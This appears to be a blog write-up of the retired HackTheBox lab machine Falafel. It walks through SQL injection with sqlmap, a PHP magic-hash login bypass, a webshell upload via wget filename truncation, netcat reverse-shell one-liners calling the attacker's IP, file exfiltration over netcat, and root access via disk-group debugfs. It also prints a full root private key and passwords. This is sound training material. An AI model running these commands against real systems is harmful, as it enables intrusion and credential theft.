HackTheBox - Falafel - Retired

HackTheBox - Falafel - Retired

Recon

Let's use threader3000 for our recon scan. It's a threaded scanner written in python that does a super quick up/down scan on all TCP ports, then suggests a nmap scan based on the results. It will automatically save the nmap scan results as XML, then we can convert it to HTML

xsltproc falafel.htb/falafel.htb.xml -o ./falafel.html

Not a whole lot to go on here just port 80 and 22, nmap does thinking it s a linux (Ubuntu) box

Port Service Version 22 OpenSSH 7.2p2 80 Apache HTTPD 2.4.18

On most hackthebox machines port 22 SSH is just a means to connect and not an attack path so let's check out port 80 and see what we see

Falafellovers

There is just this page and a login page

Nmap said there was a robots.txt file too, let's check it out.

User-agent: * Disallow: /*.txt

You don't want to index .txt files huh?

That really makes me want to look for .txt files.

dirb http://falafel.htb -X .txt

-X with dirb let's you specify an extension or list of extensions to try

Well it only found the robots.txt file we already knew about.

Weird…. Why would that be in the robots.txt just to hide the robots.txt? Let's try another wordlist and see if we find anything.

dirb http://falafel.htb /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -X .txt

Cyberlaw.txt?

Hmmm this note is interesting….

A user named Chris has alerted the admin that they can login as admin without knowing the password ( Sounds like SQLi to me). They also say they can abuse an image upload feature to take control of the website.

Running dirb with default options shows a couple of different folders

Most of them we don't have access to, yet

/uploads looks like it's pretty promising.

Let's pivot to the login page.

Let's try admin/admin for a login.

We get this interesting response from the server.

Wrong identification: admin

Is this leaking that admin is a valid login but just the wrong password?

Let's add some random gibberish to the end of admin for the username to see if we get a different response.

admin9646846589

It does, for non valid users we get "Try again.." but for valid users we get the "Wrong Identification" error.

So we know that admin is a valid username, let's capture that login again in burpsuite to see if we can get any more info 

POST /login.php HTTP/1.1 Host: falafel.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 29 Origin: http://falafel.htb Connection: close Referer: http://falafel.htb/login.php Cookie: PHPSESSID=f3f1b976svephi21i6525btpn6 Upgrade-Insecure-Requests: 1 username=admin&password=admin

Exploit

Since we are thinking it might be sqli here, let's save this request out to a file called request.txt

If we try just a standard sqlmap we get back messages saying it might not be vulnerable, but we are pretty sure it is. So let's run this command with the string option to let sqlmap know what happens when you get the wrong password for a known account..

Here is a great little site which you can use to learn more about sqlmap

https://hackertarget.com/sqlmap-tutorial/

sqlmap -level=5 -risk=3 -p username -r ./request.txt --string "Wrong identification : admin"

Now sqlmap can detect the vulnerability here.

Now we can run the same command and add --tables to get table information

Here we  can see two Databases

Information_schema the default DB and a DB named falafel

Let's see what is the DB named falafel specifically

sqlmap -level=5 -risk=3 -p username -r ./request.txt --string "Wrong identification : admin"  -D falafel --tables

A table named users, let's dump the contents of that table.

By using --dump

sqlmap -level=5 -risk=3 -p username -r ./request.txt --string "Wrong identification : admin"  -D falafel --tables --dump

Looks like we have two users account a normal user named chris ( they guy who alerted the admin to the sqli) and the admin, along with their hashses

Let's use hashid to try and figure out what type of hash this is

Could be an md5 let's use hashcat to try and break it.

0 is the mode for a md5 hash

hashcat -m 0 d4ee02a22fc872e36d9e3751ba72ddc8 /usr/share/wordlists/rockyou.txt

Looks like Chris' password is juggling.

And we are now able to login as chris

I was hoping to see an upload area here, but I don't see anything… Obviously chris was able to put this in here, so there has to be a way to upload data…

Not seeing a super obvious path here, why are they talking about juggling?

Let's google "juggling pentest" to see if there is some path we don't know about yet.

The first result is on owasp

https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf

Which talks about Type Juggling.

If a developer needed to compare the contents of two variables and they are different types, like for example compare the contents of an integer and a string.

In php in the background  it attempts to make the contents of the variables the same type so it can process a comparison. So It might take a string and try to convert it to an integer. This is documented much better than I can explain it in the link above, so check it out.

Following down the rabbit holes that we do when researching new techniques you might stumble across something called magic hashes…..

https://www.whitehatsec.com/blog/magic-hashes/

These are known hashes that leverage php type juggling to hopefully equate to true even if it's not the same hash.

So the value of 

240610708

Has a md5 hash of

0e462097431906509019562988736854

Maybe we can use this to attack the admin account, which hopefully has access to the upload.php we found earlier.

So on the login screen if we do

admin 240610708

Great that worked, we now have access to the upload feature to upload files via url, we found the /uploads/ folder earlier in our enumeration, which we assume will be the landing place for whatever we upload here… let's test that out first.

Let's serve up a png file using updog and see if it works.

First let's start updog in a directory with a png file  ( I grabbed a copy of the HTB logo for testing)

updog

Then we just need to tell the upload page where we are hosting it from

http://10.10.14.15:9090/HTB.png

Then we click upload and see this 

Upload via url: Upload Succsesful! Output: CMD: cd /var/www/html/uploads/1027-1853_4ffebf20a38154c7; wget 'http://10.10.14.15:9090/HTB.png' --2020-10-27 18:53:02--  http://10.10.14.15:9090/HTB.png Connecting to 10.10.14.15:9090... connected. HTTP request sent, awaiting response... 200 OK Length: 4577 (4.5K) [image/png] Saving to: 'HTB.png'     0K ....                                                  100%  425M=0s 2020-10-27 18:53:02 (425 MB/s) - 'HTB.png' saved [4577/4577]

So that is way too much info to let anyone see

We now know that they are using wget to download the file to /var/www/html/uploads and then saves it 

And if we try to browse to http://falafel.htb/uploads/1027-1853_4ffebf20a38154c7/HTB.png

We see the logo that we uploaded.

Cool, so we can upload files. It doesn't rename them… and it tells us where we can find them.

Let's try uploading a php webshell.

It doesn't like it "Bad Extension"

Now we are up against it…. Since this isn't a direct upload, where we might capture the upload in burp and insert some php inside of the png in transit like we used on Popcorn

https://blog.circusmonkeysecurity.com/2020/09/hackthebox-retired-popcorn-updated.html

Or magic

https://blog.circusmonkeysecurity.com/2020/08/hacktheboxeu-retired-magic.html

Since we know that they are using wget to download the file let's see if we can find a vulnerability for it.

After a google search we might come across this post

http://cerebralmanifest.com/wget-and-long-filenames-vulnerability/#:~:text=On%20many%20linux%20systems%2C%20this,one%20present%20in%20the%20url.

Which basically says that wget will shorten a file name if the name is over 240 characters, which is more a mitigation of possible issues with saving super long file names in linux itself than really a vulnerability.

Let's give it a shot with my favorite php webshell

https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php

Let's write a little python script to pop out the amount of characters we need. Let's start by adding over the 240 amount to see if we see it rewrite the file name

var = 'a' for i in range (0,  240): var = var + 'a' print(var)

I renamed the file with 240 a's inserted and put this into the upload function.

http://10.10.14.15:9090/shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php.png'

Upload Succsesful! Output: CMD: cd /var/www/html/uploads/1028-1816_7dd36b3fead468cc; wget 'http://10.10.14.15:9090/shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php.png' The name is too long, 254 chars total. Trying to shorten... New name is shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa. --2020-10-28 18:16:00--  http://10.10.14.15:9090/shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php.png Connecting to 10.10.14.15:9090... connected. HTTP request sent, awaiting response... 200 OK Length: 7206 (7.0K) [image/png] Saving to: 'shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'     0K .......                                               100% 8.49M=0.001s 2020-10-28 18:16:01 (8.49 MB/s) - 'shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' saved [7206/7206] Specify a URL of an image to upload:

Cool, we can see it strip the file name so maybe we can get this down to what we want it to do.

Just a little trial and error here to figure out exactly what length of a file name is needed to have it finally save our webshell as .php.

shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php.png

<pre>CMD: cd /var/www/html/uploads/1028-1827_779b1710e370eb78; wget 'http://10.10.14.15:9090/shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php.png'</pre>          <pre>The name is too long, 240 chars total. Trying to shorten... New name is shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php. --2020-10-28 18:27:02--  http://10.10.14.15:9090/shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php.png Connecting to 10.10.14.15:9090... connected. HTTP request sent, awaiting response... 200 OK Length: 7206 (7.0K) [image/png] Saving to: 'shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php'     0K .......                                               100%  643M=0s 2020-10-28 18:27:03 (643 MB/s) - 'shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php' saved [7206/7206]

So now if we go to

http://falafel.htb/uploads/1028-1827_779b1710e370eb78/shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php

We hopefully see our webshell..

And we can see we are in as www-data

Let's use this to get a proper shell

Let's setup our listener on our kali box first

nc  -lnvp 5555

Then we put this in execution window on our web shell

nc 10.10.14.15 5555 -e /bin/sh

No -e option with this version of netact, fine let's try mkfifo

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.15 5555 >/tmp/f

And we have our first interactive shell

Poking around in the file system we find this connection.php file.

$ cat connection.php <?php   define('DB_SERVER', 'localhost:3306');   define('DB_USERNAME', 'moshe');   define('DB_PASSWORD', 'falafelIsReallyTasty');   define('DB_DATABASE', 'falafel');   $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);   // Check connection   if (mysqli_connect_errno())   {       echo "Failed to connect to MySQL: " . mysqli_connect_error();   } ?> $

Looks like a db on this machine with a username and password..

Poking around we don't have access to either user folder on the mahine… but we have a copy of what might be moshe's password if they reused their login password for the DB.

Let's try to su as moshe.

su moshe

Ok need to upgrade our shell… we can hopefully use python to upgrade it.

$ python -c 'import pty; pty.spawn("/bin/bash")' /bin/sh: 25: python: not found

Ok what about python3

$ python3 -c 'import pty; pty.spawn("/bin/bash")' www-data@falafel:/home$ su moshe su moshe Password: falafelIsReallyTasty setterm: $TERM is not defined. moshe@falafel:/home$

Cool now we can get the user.txt file

Now we need to figure out how to escalate….

Let's use our still running updog server to download a copy of linpeas.sh (linux privilege escalation script) to falafel.

wget http://10.10.14.15:9090/linepas.sh

Then give the script execution rights

chmod +x ./linpeas.sh

It looks like moshe is a part of a group that we don't normally see in the results.

Moshe is a member of the video group.

And as always when we see something we are familiar with…. We google it

So googling "video group linux pentest"

One of the results is 

https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe

Which says member's of this group can access the screen output… and in our case 

Yossi is currently logged in, and we can grab a file that should show us the content of their screen.

This could be saved as a file on the system in /dev/

In there we can see a file name fb0 which the video group has access to.

Let's make a copy into a temporary folder.

cat /dev/fb0 > /tmp/circusmonkey/screen.raw

Then according to the blog we need to find of the terminal output so we know what size to open the file as.

cat /sys/class/graphics/fb0/virtual_size

moshe@falafel:/dev$ cat /sys/class/graphics/fb0/virtual_size cat /sys/class/graphics/fb0/virtual_size 1176,885

Now let's use netcat to transfer the file to our kali box

First let's set up a new listener on our kali box

nc -lnvp 5666 > screen.raw

Then we can send the file over with netcat on falafel

nc 10.10.14.15 5666 < /tmp/circusmonkey/screen.raw

The blog says to use GIMP to open the file

If you don't have it on your kali box you can install it with apt

Sudo apt-get install gimp

After it is installed and opened. Choose open file

Find the screen.raw file and open Select file type and select the file and Raw Image Data

If we set the width to 1176 and height to 885 we can start to see something, If we start trying some different image types we find that RGB565 Big Endian let's us see more clearly

Here we can what looks like yossi attempting to change their password to

MoshePlzStopHackingMe!

Let's see if we can ssh in as yossi now

ssh yossi@falafel.htb

Good new we can

No flag in the home directory for yossi, Let's run linpeas again as yossi to see if we can find our next step.

This time we see yossi has membership to the group disk...let's google that

Google "linux disk group privilege escalation"

We found this blog

https://reboare.gitbooks.io/booj-security/content/general-linux/privilege-escalation.html

It basically says members of this group have full read/write to a anything in the /dev folder which probably includes all disks  like /dev/sda1

It mentions a program called debufs which I'm not familiar with… so guess what we do ? we google it.

If we google "debugfs pentest" we find this site  https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host

Which says we can basically use this program to mount the drive and use ls and cd and whatever we want to read all the data.

So let's give it a try

debugfs /dev/sda1

The output looks alot like the list of the system files.

2  (12) .    2  (12) ..    11  (20) lost+found    131073  (12) etc   262145  (16) media    131075  (12) bin    262146  (12) boot   262147  (12) dev    12  (12) home    13  (12) lib    262236  (16) lib64   262238  (12) mnt    262239  (12) opt    262240  (12) proc   262241  (12) root    262244  (12) run    262257  (12) sbin   262370  (12) srv    262371  (12) sys    262372  (12) tmp    262373  (12) usr   131762  (12) var    24441  (20) initrd.img    24442  (40) vmlinuz   145141  (12) snap    44536  (24) initrd.img.old    15692  (3720) vmlinuz.old

So now we can cd /root

Now if we ls again

262241  (12) .    2  (12) ..    262242  (16) .bashrc   262243  (16) .profile    295046  (16) .cache    289943  (16) root.txt   269128  (16) .nano    402797  (12) .ssh    269130  (52) .wget-hsts   269127  (3928) .bash_history   (END)

Hopefully we can just cat out the root.txt file now

debugfs:  cat root.txt 23b7**********************************

That is good and all but we want to get a real shell on this guy..

Let's see if there is anything in the /root folder that might help us out.

262241  (12) .    2  (12) ..    262242  (16) .bashrc   262243  (16) .profile    295046  (16) .cache    289943  (16) root.txt   269128  (16) .nano    402797  (12) .ssh    269130  (52) .wget-hsts   269127  (3928) .bash_history

Look there is a .ssh folder maybe we can find roots private key in there.

cd .ssh

402797  (12) .    262241  (12) ..    402812  (16) id_rsa   402822  (40) id_rsa.pub    402824  (4016) authorized_keys

Looks like there is a file name id_rsa, id_rsa.pub and authorized keys.

If we look at id_rsa.

debugfs:  cat id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAyPdlQuyVr/L4xXiDVK8lTn88k4zVEEfiRVQ1AWxQPOHY7q0h b+Zd6WPVczObUnC+TaElpDXhf3gjLvjXvn7qGuZekNdB1aoWt5IKT90yz9vUx/gf v22+b8XdCdzyXpJW0fAmEN+m5DAETxHDzPdNfpswwYpDX0gqLCZIuMC7Z8D8Wpkg BWQ5RfpdFDWvIexRDfwj/Dx+tiIPGcYtkpQ/UihaDgF0gwj912Zc1N5+0sILX/Qd UQ+ZywP/qj1FI+ki/kJcYsW/5JZcG20xS0QgNvUBGpr+MGh2urh4angLcqu5b/ZV dmoHaOx/UOrNywkp486/SQtn30Er7SlM29/8PQIDAQABAoIBAQCGd5qmw/yIZU/1 eWSOpj6VHmee5q2tnhuVffmVgS7S/d8UHH3yDLcrseQhmBdGey+qa7fu/ypqCy2n gVOCIBNuelQuIAnp+EwI+kuyEnSsRhBC2RANG1ZAHal/rvnxM4OqJ0ChK7TUnBhV +7IClDqjCx39chEQUQ3+yoMAM91xVqztgWvl85Hh22IQgFnIu/ghav8Iqps/tuZ0 /YE1+vOouJPD894UEUH5+Bj+EvBJ8+pyXUCt7FQiidWQbSlfNLUWNdlBpwabk6Td OnO+rf/vtYg+RQC+Y7zUpyLONYP+9S6WvJ/lqszXrYKRtlQg+8Pf7yhcOz/n7G08 kta/3DH1AoGBAO0itIeAiaeXTw5dmdza5xIDsx/c3DU+yi+6hDnV1KMTe3zK/yjG UBLnBo6FpAJr0w0XNALbnm2RToX7OfqpVeQsAsHZTSfmo4fbQMY7nWMvSuXZV3lG ahkTSKUnpk2/EVRQriFjlXuvBoBh0qLVhZIKqZBaavU6iaplPVz72VvLAoGBANj0 GcJ34ozu/XuhlXNVlm5ZQqHxHkiZrOU9aM7umQkGeM9vNFOwWYl6l9g4qMq7ArMr 5SmT+XoWQtK9dSHVNXr4XWRaH6aow/oazY05W/BgXRMxolVSHdNE23xuX9dlwMPB f/y3ZeVpbREroPOx9rZpYiE76W1gZ67H6TV0HJcXAoGBAOdgCnd/8lAkcY2ZxIva xsUr+PWo4O/O8SY6vdNUkWIAm2e7BdX6EZ0v75TWTp3SKR5HuobjVKSht9VAuGSc HuNAEfykkwTQpFTlmEETX9CsD09PjmsVSmZnC2Wh10FaoYT8J7sKWItSzmwrhoM9 BVPmtWXU4zGdST+KAqKcVYubAoGAHR5GBs/IXFoHM3ywblZiZlUcmFegVOYrSmk/ k+Z6K7fupwip4UGeAtGtZ5vTK8KFzj5p93ag2T37ogVDn1LaZrLG9h0Sem/UPdEz HW1BZbXJSDY1L3ZiAmUPgFfgDSze/mcOIoEK8AuCU/ejFpIgJsNmJEfCQKfbwp2a M05uN+kCgYBq8iNfzNHK3qY+iaQNISQ657Qz0sPoMrzQ6gAmTNjNfWpU8tEHqrCP NZTQDYCA31J/gKIl2BT8+ywQL50avvbxcXZEsy14ExVnaTpPQ9m2INlxz97YLxjZ FEUbkAlzcvN/S3LJiFbnkQ7uJ0nPj4oPw1XBcmsQoBwPFOcCEvHSrg== -----END RSA PRIVATE KEY-----

That looks like it might be a private key. Let's copy the contents to a file on our kali box and name it id_rsa

After we have it saved, we need to change the permissions on the file or else ssh will yell about the permissions being to open and ignoring the file

chmod 600 ./id_rsa

Now we can try to log in as root with this key

ssh -i ./id_rsa root@falafel.htb

And then

We are in as root.

Fun.